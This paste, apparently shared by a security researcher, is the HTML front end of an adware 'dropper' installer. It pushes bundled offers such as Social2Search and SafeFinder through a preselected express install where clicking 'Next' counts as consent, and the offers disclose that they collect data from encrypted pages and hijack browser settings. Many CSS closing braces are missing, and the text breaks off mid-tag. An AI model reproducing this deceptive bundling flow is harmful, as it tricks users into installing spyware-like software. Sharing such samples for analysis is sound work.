Advertisement
benkow_

amonetize dropper

May 10th, 2016
981
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
HTML 83.45 KB | None | 0 0
  1. <!DOCTYPE html>
  2. <html>
  3. <head>
  4.     <meta http-equiv="X-UA-Compatible" content="IE=EDGE" />
  5.     <meta http-equiv="Content-Type" content="text/html;charset=utf-8" />
  6.     <style>
  7.         * {
  8.             font-size:11.5px;
  9.             font-family:verdana;
  10.         html, body {
  11.             width: 100%;
  12.             height: 100%;
  13.             font-family:verdana;
  14.             padding: 0;
  15.             margin: 0;
  16.             overflow: hidden;
  17.             background-image:url("normal_bg.jpg");
  18.         }
  19.         button {
  20.             font-family:tahoma;
  21.         a {
  22.             color:#000;
  23.                
  24.         #screens {
  25.             height:380px;
  26.             width:570px;
  27.             float:left;
  28.         #bottom {
  29.             height:50px;
  30.             width:550px;
  31.             float:left;
  32.             padding:15px;
  33.             text-align:right;
  34.         #first, #second {
  35.             padding-left:200px;
  36.         #first h1 {
  37.             margin-top:20px;
  38.             font-size:18px;
  39.         #second h1 {
  40.             margin-bottom:0px;
  41.             font-size:18px;
  42.         #first p, #second p {
  43.             font-family:Verdana;
  44.             font-size:11.5px;
  45.             margin-top:20px;
  46.         #second p {
  47.             margin-top:0px;
  48.             margin-bottom:10px;
  49.         #third {
  50.         #third h1 {
  51.             font-size:11.5px;
  52.             font-weight:bold;
  53.             padding-left:15px;
  54.             padding-top:7px;
  55.         #third h2 {
  56.             font-size:11.5px;
  57.             font-weight:normal;
  58.             padding-left:15px;
  59.         #third div {
  60.             margin-top: 50px;
  61.             margin-left: 25px;
  62.         #third p {
  63.             font-size:11.5px;
  64.             margin-left:28px;
  65.             padding-top:20px;
  66.         #display_custom {
  67.             display:none;
  68.         #appImgDisp {
  69.             position:absolute;
  70.             top:40px;
  71.             left:80px;
  72.             width:100px;
  73.             height:100px;
  74.             background-image:url("appImg.jpg");
  75.             background-size: 80px 80px;
  76.             background-repeat: no-repeat;
  77.         #offers_inside {
  78.             overflow: auto;
  79.             max-height: 150px;
  80.         #offers_inside p, #offers_inside a {
  81.             font-size:10px;
  82.         #skip {
  83.             display:none;
  84.         #skipT {
  85.             display:none;
  86.             float:left;
  87.             margin-left:10px;
  88.         #skipNextButton {
  89.             display:none;
  90.         #accept {
  91.             display:none;
  92.         .skip_button {
  93.             background:-webkit-gradient(linear, left top, left bottom, color-stop(0.05, #c0c0c0), color-stop(1, #898989));
  94.             background:-moz-linear-gradient(top, #c0c0c0 5%, #898989 100%);
  95.             background:-webkit-linear-gradient(top, #c0c0c0 5%, #898989 100%);
  96.             background:-o-linear-gradient(top, #c0c0c0 5%, #898989 100%);
  97.             background:-ms-linear-gradient(top, #c0c0c0 5%, #898989 100%);
  98.             background:linear-gradient(to bottom, #c0c0c0 5%, #898989 100%);
  99.             filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#c0c0c0', endColorstr='#898989',GradientType=0);
  100.             background-color:#c0c0c0;
  101.             -moz-border-radius:5px;
  102.             -webkit-border-radius:5px;
  103.             border-radius:5px;
  104.             border:1px solid #898989;
  105.             display:inline-block;
  106.             cursor:pointer;
  107.             color:#ffffff;
  108.             font-family:Arial;
  109.             font-size:14px;
  110.             padding:6px 20px;
  111.             text-decoration:none;
  112.         .skip_button:hover {
  113.             background:-webkit-gradient(linear, left top, left bottom, color-stop(0.05, #898989), color-stop(1, #c0c0c0));
  114.             background:-moz-linear-gradient(top, #898989 5%, #c0c0c0 100%);
  115.             background:-webkit-linear-gradient(top, #898989 5%, #c0c0c0 100%);
  116.             background:-o-linear-gradient(top, #898989 5%, #c0c0c0 100%);
  117.             background:-ms-linear-gradient(top, #898989 5%, #c0c0c0 100%);
  118.             background:linear-gradient(to bottom, #898989 5%, #c0c0c0 100%);
  119.             filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#898989', endColorstr='#c0c0c0',GradientType=0);
  120.             background-color:#898989;
  121.         .skip_button:active {
  122.             position:relative;
  123.             top:1px;
  124.         .accept_button {
  125.             background:-webkit-gradient(linear, left top, left bottom, color-stop(0.05, #08c4e1), color-stop(1, #049cb7));
  126.             background:-moz-linear-gradient(top, #08c4e1 5%, #049cb7 100%);
  127.             background:-webkit-linear-gradient(top, #08c4e1 5%, #049cb7 100%);
  128.             background:-o-linear-gradient(top, #08c4e1 5%, #049cb7 100%);
  129.             background:-ms-linear-gradient(top, #08c4e1 5%, #049cb7 100%);
  130.             background:linear-gradient(to bottom, #08c4e1 5%, #049cb7 100%);
  131.             filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#08c4e1', endColorstr='#049cb7',GradientType=0);
  132.             background-color:#08c4e1;
  133.             -moz-border-radius:5px;
  134.             -webkit-border-radius:5px;
  135.             border-radius:5px;
  136.             border:1px solid #049cb7;
  137.             display:inline-block;
  138.             cursor:pointer;
  139.             color:#ffffff;
  140.             font-family:Arial;
  141.             font-size:14px;
  142.             padding:6px 20px;
  143.             text-decoration:none;
  144.         .accept_button:hover {
  145.             background:-webkit-gradient(linear, left top, left bottom, color-stop(0.05, #049cb7), color-stop(1, #08c4e1));
  146.             background:-moz-linear-gradient(top, #049cb7 5%, #08c4e1 100%);
  147.             background:-webkit-linear-gradient(top, #049cb7 5%, #08c4e1 100%);
  148.             background:-o-linear-gradient(top, #049cb7 5%, #08c4e1 100%);
  149.             background:-ms-linear-gradient(top, #049cb7 5%, #08c4e1 100%);
  150.             background:linear-gradient(to bottom, #049cb7 5%, #08c4e1 100%);
  151.             filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#049cb7', endColorstr='#08c4e1',GradientType=0);
  152.             background-color:#049cb7;
  153.         .accept_button:active {
  154.             position:relative;
  155.             top:1px;
  156.     </style>
  157.     <script type="text/javascript" src="wrapper.js"></script>
  158. </head>
  159. <body onselectstart="return false;">
  160. <div id="appImgDisp"></div>
  161. <div id="frame">
  162.     <div id="screens"></div>
  163.     <div id="bottom">
  164.     <button id="skipT" onclick="javascript:skip();">Decline</button>
  165.     <button id="skipNextButton" onclick="javascript:skip();">Next ></button>
  166.     <button id="cancel" onclick="cancelInst();">Close</button>
  167.     <button id="next" onclick="javascript:nextScreen();">Next ></button>
  168.     <button id="skip" onclick="javascript:skip();" class="skip_button">Decline</button>
  169.     <button id="accept" onclick="javascript:nextScreen();" class="accept_button">Agree & Install</button>
  170.     </div>
  171. </div>
  172.    <script language="javascript">
  173.         if (!Array.prototype.indexOf)
  174.           Array.prototype.indexOf = function(elt /*, from*/)
  175.           {
  176.             var len = this.length >>> 0;
  177.             var from = Number(arguments[1]) || 0;
  178.             from = (from < 0)
  179.                  ? Math.ceil(from)
  180.                  : Math.floor(from);
  181.             if (from < 0)
  182.               from += len;
  183.             for (; from < len; from++)
  184.             {
  185.               if (from in this &&
  186.                   this[from] === elt)
  187.                 return from;
  188.             }
  189.             return -1;
  190.           };
  191.         var screenId=0;
  192.         var acceptedOffers = [];
  193.         var screens = [{"typ":"list","html":"<div id=\"first\"><h1>Welcome to the {appTitle} Setup Wizard<\/h1><p>This will install {appTitle} version {appVersion} on your computer.<\/p><p>It is recommended that you close all other applications before continuing.<\/p><div id=\"offers\"><form><input type=\"radio\" name=\"display\" value=\"express\" onClick=\"changeDisplay('express');\" checked> <strong>Express Install (Recommended)<\/strong><input type=\"radio\" name=\"display\" value=\"custom\" onClick=\"changeDisplay('custom');\"> Advanced Install<div id=\"offers_inside\"><div id=\"display_express\"><p style=\"margin-top:3px;\">Thank you for considering the install of {appTitle} together with recommended additions {offer_titles}. With the express option the installation will be handled automatically. By clicking \"Next\" you confirm that you agree to the agreement from {offer_titles_url}.<\/p><\/div><div id=\"display_custom\"><p style=\"margin-top:3px;\">Thank you for considering the install of {appTitle} together with recommended additions {offer_titles} below.<\/p><p>{offer_titles_desc}<\/p><\/div><\/div><\/form><\/div><p>Click Next to continue, or Cancel to exit Setup.<\/p><\/div>"},{"typ":"screen","html":"<div id=\"second\"><h1>Social2Search<\/h1>\n<div id=\"consumerinput\">\n<p>Get recommendations from friends on all websites you like to use.  Social2Search gives you personal results from Facebook and Twitter on websites like Google, TripAdvisor, Amazon and more.\n<br\/><br\/>\nFacebook and Twitter user data is used by Social2Search to give you personal results based on what you search. Social2Search may use an add-on, local proxy, dll, cookies, pixels and\/or other means to collect your IP address, URLs of the pages you visit and other information including the content of encrypted web pages to give you personal search results and show you advertising. Social2Search may protect itself from other software that tries to interfere with it. You may opt out of third party advertising and remove Social2Search at any time. <a href=\"http:\/\/goo.gl\/pcdd95\" target=\"_blank\">Learn More<\/a>. To request removal or disabling of this computer program, please contact us at this <a href=\"#\" onClick=\"loadUrl('mailto:info@Social2Search.com')\">electronic address<\/a>.\n<br\/><br\/>\nBy clicking \"Next\", I agree to <a href=\"http:\/\/goo.gl\/rGo8AD\" target=\"_blank\">Terms of Service<\/a> and <a href=\"http:\/\/goo.gl\/ce3p7N\" target=\"_blank\">Privacy Policy<\/a> and consent to install and enable Social2Search for all browsers. Please <a href=\"#\" onClick=\"loadUrl('mailto:info@Social2Search.com')\">contact us<\/a> for more information.<\/p>\n<\/div>\n<\/div>","offer_id":58,"display_button":"next"},{"typ":"screen","html":"<div id=\"second\"><div id=\"consumerinput\">\n<div style=\"font-size:11px;\">\n<p><br\/><br\/>Stay Connected with KNCTR\n<br\/><br\/>\nKNCTR is FREE entertainment platform for your desktop that lets you stay connected to the people, news & events that matter most\n<br\/><br\/>\n- Free phone calls to USA and Canada<br\/>\n- Video content updated daily<br\/>\n- Social media integration<br\/>\n<\/div>\n\n<div style=\"position:absolute;bottom:60px;right:0;width:380px;height:30px;font-size:9px;\">By clicking Next, I agree to the KNCTR <a href=\"http:\/\/goo.gl\/nZtRMT\" target=\"_blank\" style=\"font-size:9px;\">Terms of Use<\/a> and <a href=\"http:\/\/goo.gl\/H63wBn\" target=\"_blank\" style=\"font-size:9px;\">Privacy Policy<\/a>.<\/div>\n\n<\/div>\n<\/div>","offer_id":74,"display_button":"next"},{"typ":"screen","html":"<div id=\"second\"><h1 style=\"font-size:14px;margin-top:0px;\">Earn gift cards for completing surveys<\/h1>\n<div id=\"consumerinput\">\n<p style=\"font-size:9px;margin:0px;line-height:10px\">Download the software to join the Consumer Input Research Panel, provided by Compete, and register to receive $5 or more in gift cards for each survey you successfully complete! Once the software is installed and activated, it may collect the following kinds of information from your computer:<br\/>\n- Online browsing: This includes the sites you visit, including news sites or social networks, and your interactions with those sites, and interactions that they make on your behalf.<br\/>\n- Online activities: This includes the search terms you enter and the results of such searches, the videos you view, the products you shop for online, information you enter into forms, the materials you download or upload, the advertisements you see, information and content on web pages you visit or with which you interact and may include personal, financial and health information.<br\/>\n- Information on secure pages: This includes information and content from protected or secure pages that you access, such as online accounts or the content of complete and incomplete consumertransactions when you are checking out through a website's shopping cart, even if the website makes this information unreadable to others.<br\/>\n- System information: This includes information about the computer and browser that you are running on, including the IP address of the computer, unique identifiers used by websites and applications (such as those found in cookies), how the software is operating, and which other applications are installed or running.<\/p>\n<div style=\"width:350px;height:30px;border: 2px solid #cccccc;padding: 5px;font-family: Tahoma, sans-serif;overflow: auto;resize:both;-moz-appearance: textfield-multiline;-webkit-appearance: textarea;margin-top:0px;\">\n<p style=\"font-size:9px;margin:0px;line-height:10px\">The above list contains examples, and is not a comprehensive list of every data element. The software may also modify or replace content or ads that you see as part of a market research study. Filtering of certain personally identifiable or sensitive information - Compete has established certain procedural and technical privacy rules designed to try to avoid the collection of certain types of personally identifiable and sensitive information that can be identified by those processes, such as credit card numbers, social security numbers, email addresses and email content from most web-based email accounts. Despite our efforts, certain personally identifiable or sensitive information might get through the privacy rules and procedures. However, we do not knowingly use any inadvertently retained personally identifiable or sensitive information in our services.<br\/>\nWe may combine data collected by the service, data collected outside the service but part of the program, data collected by our related programs, and data obtained from other sources. We use this information to conduct research and analysis, and may share the information with our customers, partners, and affiliates. However, we prohibit our customers, partners, and affiliates from using your information to target advertising to you individually, although they may use the analysis to improve the way they generally target advertising to consumer market segments to which you may belong. We may use the information to determine whether to invite you to participate in a research survey.<br\/>\nFor more information about our information collection and use practices, please read our <a href=\"http:\/\/goo.gl\/rIyJll\" target=\"_blank\" style=\"font-size:9px\">Privacy Policy<\/a>.<br\/>\nIf you participate in any other research panels or programs run by us (whether directly or indirectly, and regardless of device and applicable policy for each such other program), by joining this program you agree that we may use any information we have about you to match the data collected through this program with the data collected through such other panels and programs (including data collected in the past), and use the combined \"multi-device\" data pursuant to the most restrictive applicable <a href=\"http:\/\/goo.gl\/rIyJll\" target=\"_blank\" style=\"font-size:9px\">privacy policy<\/a>. If you are upgrading the Software from an older version, re-joining this research program, or otherwise accepting the latest version of this Policy, you agree that after doing so, your data previously collected by Compete under your prior participation in the program may be used as described in this Policy.<\/p>\n<\/div>\n\n<p style=\"font-size:9px;margin:0px;line-height:10px;\">You may always uninstall the Software by following the removal instructions provided <a href=\"https:\/\/goo.gl\/2cBD4y\" target=\"_blank\" style=\"font-size:9px\">here<\/a>. For more information about our information collection and use practices, please read our <a href=\"http:\/\/goo.gl\/rIyJll\" target=\"_blank\" style=\"font-size:9px\">Privacy Policy<\/a>. By installing\/upgrading the software, you agree to the terms of our <a id=\"terms\" href=\"http:\/\/goo.gl\/yTeKb8\" target=\"_blank\" style=\"font-size:9px\">End User License Agreement<\/a> and consent to install Consumer Input and automatically enable it on your Firefox, Internet Explorer, and Chrome browsers.<\/p>\n\n<\/div>\n<\/div>","offer_id":143,"display_button":"nextblur"},{"typ":"screen","html":"<div id=\"second\"><div id=\"consumerinput\">\n<br\/>\n<strong>SafeFinder<\/strong>\n<br\/>\n<br\/>\n<div style=\"width:350px;height:200px;border: 2px solid #cccccc;padding: 5px;font-family: Tahoma, sans-serif;overflow: auto;resize:both;-moz-appearance: textfield-multiline;-webkit-appearance: textarea;margin-top:0px;\">\nLinkury Ltd.<br\/>\n<br\/>\n(individually and collectively with any subsidiary thereof \"Linkury\")<br\/>\n<br\/>\nTerms of service<br\/>\nThe Services and This Agreement<br\/>\n<br\/>\nThe user (\"You\" or \"User\") of any Linkury software, websites, forums, or mediated functionality (individually and collectively - the \"Linkury Services\") agrees that the use of any Linkury Services, is covered by this agreement (the \"Agreement\"). Unless explicitly stated otherwise, any new features to the current Linkury Services, including the release of new Linkury properties, shall be subject to the Agreement. In addition, when using particular Linkury Service (whether owned or operated by Linkury), You and Linkury shall be subject to any posted guidelines or rules applicable to such services, which may be posted and modified from time to time. All such guidelines or rules are hereby incorporated by reference into the Agreement. Linkury may also offer other services that are governed by different Terms of Service.<br\/>\n<br\/>\nLinkury provides Users, inter alia, with a to be implemented in User's web browser. You also understand and agree that the Linkury Services may include advertisements and that these advertisements are necessary for Linkury to provide the Services. You also understand and agree that the Linkury Services may include certain communications from Linkury and you will not be able to opt out of receiving them.<br\/>\n<br\/>\nYou are responsible for obtaining access to the Linkury Services, and that access may involve third-party fees (such as Internet service provider or airtime charges). You are responsible for those fees, including those fees associated with the display or delivery of advertisements. In addition, You must provide and are responsible for all equipment necessary to access the Linkury Services.<br\/>\n<br\/>\nYou understand that the technical processing and transmission of the Linkury Services, including content provided by You, may involve (a) transmissions over various networks; and (b) changes to conform and adapt to technical requirements of connecting networks or devices.<br\/>\n<br\/>\nCertain Linkury Services may contain or direct User to adult or mature content, and You must be at least 18 years of age to access and view same.<br\/>\n<br\/>\nProvision of the Services<br\/>\nAs a condition precedent of your use of the Linkury Services, you represent that you are of legal age to form a binding contract under the laws of any applicable jurisdiction and are not a person barred from receiving the Linkury Services under the laws of the United States or any other applicable jurisdiction<br\/>\n<br\/>\nUser agrees that Linkury may use subsidiaries, agents, or third-parties located anywhere in the world, to provide the Linkury Services. The User agrees that the provision of the Linkury Services, their extent, functionality, form and nature may change at the sole and exclusive discretion of Linkury, all without prior notice to you.<br\/>\n<br\/>\nUser may stop using the Linkury Services at any time and does not need to provide notice to Linkury.<br\/>\n<br\/>\nUser understands and agrees that the termination of the Linkury Services, or changes to the extent, functionality, form or nature of the Linkury Services may result in loss of information which may include account details, or information User has provided. User agrees to hold Linkury harmless for any loss or damage arising directly or indirectly from the loss of information contemplated herein or for the termination of Linkury Services.<br\/>\n<br\/>\nUser agrees that Linkury may unilaterally edit, modify or delete information or content provided as part of the Linkury Services.<br\/>\n<br\/>\nUse of the Services and User conduct<br\/>\nUser agrees to use the Linkury Services addressed by this Agreement, is restricted to ways, and for purposes, allowed by this Agreement and all applicable laws, or regulations in relevant jurisdictions (including any laws regarding the export of data or software to and from relevant countries). User agrees that it will not directly or indirectly engage in any activity that interferes with, or disrupts, the provision of the Linkury Services.<br\/>\n<br\/>\nUser agrees not to sell, provide, duplicate or otherwise make available the Linkury Services to anyone other than for its own personal purposes. The User agrees that any use of the Linkury Services or breach of the terms of this Agreement is the User's sole responsibility, including, but not limited to, any resulting consequences such as damages or harm Linkury may suffer due to User's failure to abide by the Terms of This Agreement. Linkury EXPLICITLY DISCLAIMS LIABILITY FOR ANY AND ALL LOSSES AND DAMAGES ARISING FROM USER's, OR ANYONE ON ITS BEHLF, USE OF THE Linkury SERVICES.<br\/>\n<br\/>\nUser agrees not to access (or attempt to access) any of the Linkury Services by any means other than through the interface that is provided by Linkury, including, but not limited to, specifically agree not to access (or attempt to access) any of the Linkury Services through any automated means.<br\/>\n<br\/>\nUser agrees not to restrict, discourage or inhibit any person from using the Linkury Services, disclose personal information of others through the Linkury Services or obtained through the Linkury Services, collect information about users of the Services, \"stalk\" or otherwise harass another user, reverse engineer, disassemble or decompile any section or technology of or in the Linkury Services, or gain unauthorized access to the Linkury Services, to other users' accounts, names or personally identifiable information, or to other computers, software or websites connected or linked to the Linkury Services;<br\/>\n<br\/>\nUser agrees not to, with respect to the Linkury Services, a) launch or use any automated system, including without limitation, \"robots,\" \"spiders,\" or \"offline readers,\" that access the Linkury Services in a manner that sends more request messages to Linkury servers in a given period of time than a human can reasonably produce in the same period by using a conventional web browser; b) send or otherwise transmit to or through the Linkury Services chain letters, unsolicited messages, so-called \"spamming\" or \"phishing\" messages, or messages marketing or advertising goods and services; c) post, transmit or otherwise make available any virus, worm, spyware or any other computer code, file or program that may or is intended to damage or hijack the operation of any hardware, software or telecommunications equipment; d) violate any applicable laws or regulations; or e) assist or permit any persons in engaging in any of the activities described above.<br\/>\n<br\/>\nUser understands that all information and content, whether publicly posted or privately transmitted, are the sole responsibility of the person from whom such content originated. This means that You are entirely responsible for all content that you upload or otherwise make available via the Linkury Services. Linkury does not control the content posted via the Linkury Services. You understand that by using the Linkury Services, You may be exposed to content that is offensive, indecent or objectionable. Under no circumstances will Linkury be liable in any way for any content, including, but not limited to, any errors or omissions in any content, or any loss or damage of any kind incurred as a result of the use of any content posted, transmitted or otherwise made available via the Linkury Services.<br\/>\n<br\/>\nUser agrees to not use the Linkury Services to upload, post. email transmit or otherwise make available any content that is unlawful, harmful, threatening, abusive, harassing, tortious, defamatory, vulgar, obscene, libelous, invasive of another's privacy, hateful, or racially, ethnically or otherwise objectionable<br\/>\n<br\/>\nUser agrees to not use the Linkury Services to harm minors in any way<br\/>\n<br\/>\nUser agrees to not use the Linkury Services to impersonate any person or entity.<br\/>\n<br\/>\nYou agree to not upload, post. email transmit or otherwise make available via the Linkury Services any content that you do not have a right to make available under any law or under contractual or fiduciary relationships (such as inside information, proprietary and confidential information learned or disclosed as part of employment relationships or under nondisclosure agreements or any content that infringes any patent, trademark, trade secret, copyright or other proprietary rights); You agree to not provide material support or resources (or to conceal or disguise the nature, location, source, or ownership of material support or resources) to any organization(s) designated by the United States or any other applicable government as a foreign terrorist organization pursuant to section 219 of the Immigration and Nationality Act or any similar law<br\/>\n<br\/>\nIntellectual Property Rights and Trademark information<br\/>\n<br\/>\nUser acknowledges and agrees that Linkury owns all legal right, title and interest in and to the Linkury Services, including any intellectual property rights which subsist in the Linkury Services (whether those rights happen to be registered or not, and wherever in the world those rights may exist). User further acknowledge that Linkury Services may contain information which is designated confidential by Linkury and that User shall not disclose such information without Linkury's prior written consent. User agrees that data generated in performance of the Linkury Services is the sole and exclusive property of Linkury, its users or its licensors with all rights reserved. Except as expressly authorized by Linkury, You agree not to modify, rent, lease, loan, sell, distribute, transmit, broadcast, publicly perform or create derivative works based on the Linkury Services.<br\/>\n<br\/>\nUser is granted a limited license to access and use the Linkury Services and to download or print a copy of any portion of the Linkury Services to which it has properly gained access solely for its personal, non-commercial use, provided that all copyright or other proprietary notices are maintained intact. Such license is subject to this Agreement and does not permit use of any data mining, robots, scraping or similar data gathering or extraction methods.<br\/>\n<br\/>\nAny use of the Linkury Services other than as specifically authorized herein, without the prior written personal permission of Linkury, is strictly prohibited and will terminate the license granted herein. Such unauthorized use may also violate applicable laws including copyright and trademark laws and applicable communications regulations and statutes. Unless explicitly stated herein, nothing in this Agreement shall be construed as conferring any license to intellectual property rights, whether by estoppel, implication or otherwise. The license granted hereunder is revocable by Linkury at any time without notice and with or without cause.<br\/>\n<br\/>\nUser agrees that all of Linkury`s trademarks, trade names, service marks and other Linkury logos and brand features, and product and service names are trademarks and the property of Linkury Ltd. (the \"Linkury Marks\"). Without Linkury's prior written permission, You agree not to display or use in any manner the Linkury Marks.<br\/>\n<br\/>\nLicense to Use<br\/>\n<br\/>\nLinkury grants to User a personal, worldwide, royalty-free, non-assignable and non-exclusive license to use the software forming part of the Linkury Services, if any, provided by Linkury as part of the Linkury Services (\"Software\"). This license is for the sole purpose of enabling User to use and enjoy the benefit of the Linkury Services as provided by Linkury, in the manner permitted by this Agreement and subject to any applicable law.<br\/>\nUser agrees not to (and not to permit anyone else to) copy, modify, create a derivative work of, reverse engineer, decompile or otherwise attempt to extract the source code of the Software or any part thereof, unless this is expressly permitted or required by law, or unless the user has been authorized by Linkury in writing.<br\/>\nUser may not assign (or grant a sub-licence of) its rights to use the Software, grant a security interest in or over User's rights to use the Software, or otherwise transfer any part of its rights to use the Software.<br\/>\nTermination<br\/>\n<br\/>\nThe terms of the Agreement will continue to apply until terminated by Linkury, as contemplated herein.<br\/>\nYou agree that Linkury may, without any prior notice, immediately terminate, limit your access to or suspend your Linkury account, and\/or access to the Linkury Services, at its sole discretion, with no need to explain the cause for such termination. Further, You agree that Linkury shall not be liable to You or any third party for any termination of your account or access to the Linkury`s Services.<br\/>\nUpon termination, all of the legal rights, obligations and liabilities that have accrued to User and Linkury which are expressed, contemplated or by their nature must continue indefinitely, shall be unaffected by this termination.<br\/>\nExclusion Of Warranties and Limitations of Liability<br\/>\n<br\/>\nUSER EXPRESSLY UNDERSTANDS AND AGREES THAT ITS USE OF THE Linkury SERVICES IS AT ITS SOLE RISK AND THAT THE SERVICES ARE PROVIDED ON AN \"AS IS\" AND 'AS AVAILABLE \" BASIS.<br\/>\n<br\/>\nANY MATERIAL DOWNLOADED OR OTHERWISE OBTAINED THROUGH THE USE OF THE Linkury SERVICES IS DONE AT USER'S DISCRETION AND RISK AND USER WILL BE SOLELY RESPONSIBLE FOR ANY DAMAGE TO ITS COMPUTER SYSTEM OR OTHER DEVICE OR LOSS OF DATA THAT RESULTS FROM THE DOWNLOAD OF ANY SUCH MATERIAL.<br\/>\n<br\/>\nNO ADVICE OR INFORMATION, WHETHER ORAL OR WRITTEN, OBTAINED BY USER FROM Linkury OR THROUGH OR FROM THE Linkury SERVICES SHALL CREATE ANY WARRANTY NOT EXPRESSLY STATED IN THIS AGREEMENT.<br\/>\nLinkury FURTHER EXPRESSLY DISCLAIMS ALL WARRANTIES AND CONDITIONS OF ANY KIND, WHETHER EXPRESS OR IMPLIED, INCLUDING, BUT NOT LIMITED TO THE IMPLIED WARRANTIES AND CONDITIONS OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NON-INFRINGEMENT OF THE Linkury SERVICES.<br\/>\nIN PARTICULAR, Linkury, ITS AFFILIATES, AND ITS LICENSORS DO NOT REPRESENT OR WARRANT TO USER THAT:<br\/>\n(i) USE OF THE Linkury SERVICES WILL MEET ANY USER'S REQUIREMENTS,<br\/>\n(ii) USE OF THE Linkury SERVICES WILL BE UNINTERRUPTED, TIMELY, SECURE OR FREE FROM ERROR.<br\/>\n(iii) ANY INFORMATION OBTAINED BY USER AS A RESULT OF ITS USE OF THE Linkury SERVICES WILL BE ACCURATE OR RELIABLE, OR<br\/>\n(iv) THAT DEFECTS IN THE OPERATION OR FUNCTIONALITY OF ANY SOFTWARE PROVIDED TO USER AS PART OF THE Linkury SERVICES WILL BE CORRECTED.<br\/>\nIN NO EVENT WILL Linkury OR ITS DIRECTORS, EMPLOYEES OR AGENTS BE LIABLE TO USER OR ANY THIRD PERSON FOR ANY INDIRECT, CONSEQUENTIAL, EXEMPLARY, INCIDENTAL, SPECIAL OR PUNITIVE DAMAGES, INCLUDING FOR ANY LOST PROFITS OR LOST DATA ARISING FROM USER'S USE OF SOFTWARE, THE Linkury SERVICE, ANY PLATFORM APPLICATIONS OR ANY OF WEB BASED INTERFACE CONTENT OR OTHER MATERIALS ON, ACCESSED THROUGH OR DOWNLOADED USING THE Linkury SERVICES, EVEN IF Linkury IS AWARE OR HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. NOTWITHSTANDING ANYTHING TO THE CONTRARY CONTAINED HEREIN, Linkury'S LIABILITY TO USER FOR ANY CAUSE WHATSOEVER, AND REGARDLESS OF THE FORM OF THE ACTION, WILL AT ALL TIMES BE LIMITED TO THE AMOUNT PAID, IF ANY, BY USER TO Linkury FOR THE Linkury SERVICE DURING THE TERM, BUT IN NO CASE WILL THE Linkury'S LIABILITY TO THE USER EXCEED $200. USER ACKNOWLEDGES THAT IF NO FEES ARE PAID BY IT TO Linkury FOR THE SERVICE, USER SHALL NOT BE ENTITLED TO DAMAGES OF ANY KIND FROM Linkury, REGARDLESS OF THE CAUSE OF ACTION.<br\/>\nWITHOUT DEROGATING FROM THE PROVISION IN THIS SECTION 7 ABOVE, USER EXPRESSLY UNDERSTANDS AND AGREES THAT Linkury, ITS AFFILIATES, AND ITS LICENSORS SHALL NOT BE LIABLE TO USER FOR ANY LOSS OR DAMAGE WHICH MAY BE INCURRED BY IT AS A RESULT OF: (i) ANY CHANGES WHICH Linkury MAY MAKE TO THE Linkury SERVICES, OR FOR ANY PERMANENT OR TEMPORARY CESSATION IN THE PROVISION OF THE Linkury SERVICES, OR ANY PART THEREOF OT FEATURES WITHIN THE Linkury SERVICES; (ii) THE DELETION OF, CORRUPTION OF, OR FAILURE TO STORE, ANY CONTENT AND OTHER COMMUNICATIONS DATA MAINTAINED OR TRANSMITTED BY OR THROUGH ITS USE OF THE Linkury SERVICES; (iii) USER'S FAILURE TO KEEP ITS PASSWORD OR ACCOUNT DETAILS SECURE AND CONFIDENTIAL. IF AND TO THE EXTENT THAT ANY LIMITION OF Linkury'S WARRANTY OR LIABILITY IS EXCLUDED OR LIMITED BY APPLICABLE LAW, ONLY THE LIMITATIONS WHICH ARE LAWFUL IN THE USER'S JURISDICTION WILL APPLY TO THE USER AND Linkury LIABILITY WILL BE LIMITED TO THE MAXIMUM EXTENT PERMITTED BY SUCH APPLICABLE LAW.<br\/>\nPrivacy and Personal Information<br\/>\n<br\/>\nInformation on Linkury's personal information protection polices and practice can be found at the Linkury website, www.Linkury.com. The User agrees that these policies apply to this Agreement and are incorporated herein as an integral part thereof, the provision of Linkury Services and the information User provides through use of the Linkury Services.<br\/>\nUser understands that through your use of the Linkury Services it consents to the collection and use (as set forth in the applicable privacy policy) of certain personal information.<br\/>\nIndemnification<br\/>\n<br\/>\nUser agrees to indemnify, defend and hold Linkury and its directors, officers, employees, agents and contractors harmless from and against any and all claims, damages, losses, costs (including without limitation reasonable attorneys' fees) or other expenses that arise directly or indirectly out of or from (i) User's breach of any provision of this Agreement; or (ii) User's activities in connection with the Linkury Services.<br\/>\nGeneral<br\/>\n<br\/>\nThis Agreement contains the complete agreement concerning the access, use and provision of the Linkury Services between the parties and shall, as of the date hereof, supersede all other agreements or arrangements between the parties with regard to the subject matter hereof.<br\/>\nThis Agreement shall be binding upon and inure to the benefit of the parties hereto and their respective heirs, legal representatives, successors and assigns.<br\/>\nNo waiver or modification of this Agreement or of any covenant, condition, or limitation herein contained shall be valid unless in writing and duly executed by the party to be charged therewith and no evidence of any waiver or modification shall be offered or received in evidence of any proceeding, arbitration, or litigation between the parties hereto arising out of or affecting this Agreement, or the rights or obligations of the parties hereunder, unless such waiver or modification is in writing, duly executed as aforesaid.<br\/>\nThe failure of Linkury to exercise or enforce any right or provision of the Agreement shall not constitute a waiver of such right or provision.<br\/>\nUser agrees that regardless of any statute or law to the contrary, any claim or cause of action arising out of or related to use of the Linkury Services or this Agreement must be filed within one (1) year after such claim or cause of action arose or be forever barred<br\/>\nAll agreements and covenants contained herein are severable. If any provision of the Agreement is found by a court of competent jurisdiction to be invalid, the parties nevertheless agree that the court should endeavor to give effect to the parties' intentions as reflected in the provision, and the other provisions of the Agreement remain in full force and effect<br\/>\nThe captions and headings in this Agreement, have been inserted for convenience only and shall not be deemed to limit or otherwise affect any of the provisions of this Agreement.<br\/>\nIt is the intention of the parties hereto that this Agreement and the performance hereunder be construed in accordance with, under and pursuant to the laws of the State of Israel without regard to the jurisdiction in which any action or special proceeding may be instituted.<\/div>\n<div style=\"font-size:11px;\">\nIn the age of too much information, SafeFinder presents the perfect tool. Click \"Next\" now to continue and install SafeFinder, set SafeFinder as my default search provider and set SafeFinder as my home page and new tab in my browsers. Simplify the web, SafeFinder gives you the optimal way to share, search, work & play.\n<\/div>\n<div style=\"position:absolute;bottom:60px;right:0;width:380px;height:30px;font-size:9px;\">By clicking Next, I agree to the SafeFinder <a href=\"http:\/\/goo.gl\/do8ooC\" target=\"_blank\" style=\"font-size:9px;\">Terms of Use<\/a> and <a 